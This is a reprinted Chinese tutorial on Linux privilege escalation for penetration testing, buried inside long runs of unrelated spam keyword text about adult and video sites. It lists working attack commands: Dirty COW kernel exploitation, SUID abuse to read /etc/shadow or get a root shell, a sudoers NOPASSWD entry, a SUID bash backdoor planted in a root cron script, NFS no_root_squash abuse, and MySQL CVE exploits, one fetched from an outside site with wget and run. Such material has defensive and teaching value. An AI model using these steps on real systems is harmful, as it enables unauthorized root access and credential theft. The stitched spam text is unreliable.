国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

Linux提權的幾種常用方式

系統 Linux
在滲透測試過程中,提升權限是非常關鍵的一步,攻擊者往往可以通過利用內核漏洞/權限配置不當/root權限運行的服務等方式尋找突破點,來達到提升權限的目的。

[[373960]]

本文轉載自微信公眾號「Bypass」,作者Bypass 。轉載本文請聯系Bypass公眾號。

在滲透測試過程中,提升權限是非常關鍵的一步,攻擊者往往可以通過利用內核漏洞/權限配置不當/root權限運行的服務等方式尋找突破點,來達到提升權限的目的。

1、內核漏洞提權

提起內核漏洞提權就不得不提到臟牛漏洞(Dirty Cow),是存在時間最長且影響范圍最廣的漏洞之一。低權限用戶可以利用該漏洞實現本地提權,同時可以通過該漏洞實現Docker容器逃逸,獲得root權限的shell。

1.1 本地內核提權

(1)檢測內核版本

  1. # 查看系統發行版本 
  2. lsb_release -a 
  3. # 查看內核版本 
  4. uname -a 

 

(2) 下載,編譯生成exp文件

  1. bypass@ubuntu:~$ make 

 

(3)執行成功,返回一個root權限的shell。

 

1.2 利用DirtyCow漏洞實現Docker逃逸

(1)進入容器,編譯POC并執行:

 

(2)在攻擊者機器上,成功接收到宿主機反彈的shell。

 

1.3 Linux提權輔助工具

github項目地址:

  1. https://github.com/mzet-/linux-exploit-suggester.git 

(1)根據操作系統版本號自動查找相應提權腳本

  1. wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh 

 

(2)根據提示下載poc,編譯執行。

 

2、利用SUID提權

SUID是一種特殊權限,可以讓調用者在執行過程中暫時獲得該文件擁有者的權限。如果可以找到并運行root用戶所擁有的SUID的文件,那么就可以在運行該文件的時候獲得root用戶權限。

(1)在Linux中查找可以用來提權的SUID文件

  1. find / -perm -u=s -type f 2>/dev/null 

 

(2)通過find以root權限執行命令

 

可用作Linux提權的命令及其姿勢:

  1. #Find 
  2. find pentestlab -exec whoami \; 
  3. #Vim 
  4. vim.tiny /etc/shadow 
  5. #awk 
  6. awk 'BEGIN{system("whoami")}' 
  7. #curl 
  8. curl file:///etc/shadow 
  9. #Bash 
  10. bash -p   
  11. #Less 
  12. less /etc/passwd 
  13. #Nmap 
  14. nmap --interactive 

3、SUDO提權

普通用戶在使用sudo執行命令的過程中,會以root方式執行命令。在很多場景里,管理員為了運維管理方便,sudoer配置文件錯誤導致提權。

(1)設置sudo免密碼

  1. $vi /etc/sudoers 
  2. 在最后一行添加:bypass ALL=(ALL:ALL) NOPASSWD:ALL 

(2)查看sudo的權限

 

4、計劃任務

如果可以找到可以有權限修改的計劃任務腳本,就可以修改腳本實現提權。本質上,就是文件權限配置不當。

(1)查看計劃任務,找到有修改權限的計劃任務腳本。

  1. ls -l /etc/cron* 
  2. more /etc/crontab 

 

(2)在mysqlback.sh 添加 SUID shell后門,當定時任務以root再次執行的時候,可以獲取root權限。

  1. cp /bin/bash /tmp/shell 
  2. chmod u+s /tmp/shell 

 

5、NFS提權

當服務器中存在NFS共享,開啟no_root_squash選項時,如果客戶端使用的是root用戶,那么對于共享目錄來說,該客戶端就有root權限,可以使用它來提升權限。

(1)查看NFS服務器上的共享目錄

  1. sudo showmount -e 10.1.1.233 

 

(2)創建本地掛載目錄,掛載共享目錄。使用攻擊者本地root權限創建Suid shell。

  1. sudo mkdir -p /tmp/data 
  2. sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data 
  3. cp /bin/bash /tmp/data/shell 
  4. chmod u+s /tmp/data/shell 

 

(3)回到要提權的服務器上,使用普通用戶使用-p參數來獲取root權限。

 

6、MySQL提權

MySQL提權方式有UDF提權,MOF提權,寫入啟動項提權等方式,但比較有意思的是CVE-2016-6663、CVE-2016-6664組合利用的提取場景,可以將一個www-data權限提升到root權限。

(1)利用CVE-2016-6663將www-data權限提升為mysql權限:

  1. cd /var/www/html/ 
  2. gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient 
  3. ./mysql-privesc-race test 123456 localhost testdb 

(2)利用CVE-2016-6664將Mysql權限提升為root權限:

  1. wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh 
  2. chmod 777 mysql-chowned.sh 
  3. ./mysql-chowned.sh /var/log/mysql/error.log 

 

責任編輯:武曉燕 來源: Bypass
相關推薦

2021-01-13 08:14:36

Windows提權漏洞攻擊

2018-07-05 10:44:09

Windows提權漏洞

2024-07-31 08:46:10

2017-03-25 20:30:15

2024-01-15 00:25:59

2009-07-25 17:24:45

2011-03-07 11:36:23

FileZillaSe

2022-03-10 09:41:15

漏洞Linux內核

2010-12-10 15:23:49

Linux漏洞

2024-07-31 08:50:20

2023-09-07 13:21:00

Linux軟件

2013-10-18 10:10:45

Linux漏洞代碼提權

2009-07-25 16:52:29

2009-09-28 10:52:33

Hibernate主鍵主鍵生成

2020-08-25 08:53:02

Linux端口轉發

2021-08-06 18:37:50

SQL表連接方式

2018-07-06 13:02:23

2013-11-29 15:34:00

2021-05-01 20:52:30

漏洞網絡安全網絡攻擊

2023-06-11 17:24:26

點贊
收藏

51CTO技術棧公眾號

久久精品亚洲国产奇米99| 国产主播一区二区| 中文字幕av一区中文字幕天堂| 手机福利小视频在线播放| 91免费观看在线| 亚洲免费不卡| 伊人影院久久| 成人情趣片在线观看免费| 第四色中文综合网| 中文字幕亚洲无线码a| 超碰成人av| 欧美va天堂va视频va在线| 一级视频在线观看| 伊人色综合久久天天| 久久久久久久片| 91丨九色丨蝌蚪丨老版| 日韩精品视频在线观看视频| 久久成人免费日本黄色| 日本在线观看一区二区三区| 新67194成人永久网站| 国产女人水真多18毛片18精品| 亚洲破处大片| 2014亚洲精品| 亚洲午夜电影| 久久精品日产第一区二区三区精品版 | 香蕉自在线视频| 国产精品亚洲一区二区三区在线 | 久久永久免费| 亚洲春色综合另类校园电影| 亚洲情侣在线| 日韩手机在线观看视频| 成人黄页毛片网站| 艳母动漫在线观看| 成人精品小蝌蚪| 激情综合网婷婷| 国产三级三级三级精品8ⅰ区| 亚洲一二三区av| 亚洲天堂av一区| 大地资源高清播放在线观看| 一区二区久久久久久| 亚洲男人网站| 日韩一级片网站| 精品蜜桃一区二区三区| 久久久国产精品| 国模精品娜娜一二三区| 久久久黄色av| 另类小说第一页| 国产精品一区二区性色av| 91精品福利在线一区二区三区| 男人天堂成人网| 亚洲高清不卡一区| 麻豆亚洲精品| 久久久久福利视频| 成人三级在线视频| 日本成人免费网站| 欧美色视频日本版| av大全在线免费看| 亚洲视频在线观看免费| 风间由美性色一区二区三区四区| 91精品国产自产在线观看永久| 一本久道久久综合狠狠爱| 黄色一级片国产| 亚洲免费在线电影| 国产视频一区二区| 欧美精品在线视频观看| 日韩欧美一区免费| 性欧美.com| 1000精品久久久久久久久| 免费黄网站在线| 久久成人人人人精品欧| 888久久久| 久久成人免费观看| 欧洲另类一二三四区| 中文另类视频| 国产精品女人久久久久久| 日韩综合在线视频| v888av成人| 一区二区在线免费| 国产精品中文字幕亚洲欧美| 一区二区高清视频| 国产乱码字幕精品高清av| 欧美aaaaaaa| 一区二区三区日韩在线| 日本国产一区| 99re在线观看| 91天堂素人约啪| 国产永久av在线| 久久精品视频免费播放| 国产精品大片| 成年网站在线播放| 国产色99精品9i| 欧美特黄一级大片| 日韩欧美手机在线| 一区二区欧美国产| 久久电影tv| 国产原创欧美精品| 99视频有精品| 超碰91在线观看| 亚洲free性xxxx护士白浆| 97精品电影院| 爱福利在线视频| 久久99精品久久久久久秒播放器 | 国产美女精彩久久| 久久久综合网站| 西游记1978| 久久99精品国产91久久来源| 日韩有码电影| 亚洲一区二区精品在线| 午夜视频久久久| 日本1级在线| 91精品国产91久久久久久最新| 麻豆视频观看网址久久| 在线成人动漫| 韩国福利视频一区| 国产精品中文字幕日韩精品| 免费a级人成a大片在线观看| 国产日韩欧美中文| 亚洲女同一区二区| 免费污视频在线一区| 亚洲精品自在在线观看| 欧美日韩免费一区二区三区视频| 欧美日韩另类图片| 精品久久久久av| 中文字幕亚洲综合久久| 狠狠v欧美v日韩v亚洲ⅴ| 影音先锋男人在线资源| 国内精品国语自产拍在线观看| 精品久久香蕉国产线看观看亚洲 | 欧美日韩激情一区| 亚洲欧美综合久久久| 波多野结衣久草一区| 日韩av在线影院| 97se亚洲国产综合自在线| 一区二区三区四区在线看| 亚洲美免无码中文字幕在线| 色七七影院综合| 在线观看欧美日韩国产| 日本最新不卡在线| 麻豆网站在线| 国产一区二区三区色淫影院| 在线观看一区日韩| 91精品精品| 国产精品麻豆一区二区三区| 国产精品免费在线播放| 欧美性xxxxxxxx| 综合一区av| 久久九九全国免费| 国产精品久久久久久模特| 日韩五码电影| 亚洲mv在线| 在线午夜精品自拍| 欧美日韩成人综合天天影院| 久久精品伊人| 成人三级av在线| 中文在线字幕免费观看| 日本老熟妇毛茸茸| 九九热只有这里有精品| 国产亚洲视频中文字幕视频| 国产一区二区毛片| 日韩国产在线| 国产传媒一区| 精品日产卡一卡二卡麻豆| 成人av网站免费观看| 青青青免费在线视频| 一本色道婷婷久久欧美| 久久韩国免费视频| 欧美视频在线一区二区三区 | 91日韩在线播放| 精品乱码亚洲一区二区不卡| 久久久久久麻豆| 福利一区福利二区| 久久国产精品第一页| 999精品在线| 日韩国产精品大片| 欧美国产日本| 一区二区三区四区国产| 久久精品国产亚洲精品2020| 亚洲天堂2016| 午夜一级在线看亚洲| 高清不卡一区| 国产高清在线看| 五十路熟女丰满大屁股| 国产欧美日韩高清| 亚洲第一精品自拍| 国产精品人妖ts系列视频| 在线播放亚洲| 欧美在线视频在线播放完整版免费观看 | 羞羞的视频网站| 国产成人亚洲综合无码| 日本欧美黄色片| 一本久久综合亚洲鲁鲁五月天| 性伦欧美刺激片在线观看| 偷拍自拍亚洲| 国产对白叫床清晰在线播放| 免费观看亚洲视频| 欧美俄罗斯乱妇| 做爰高潮hd色即是空| 中日韩免费毛片| 日本三级在线播放完整版| 国产深夜视频在线观看|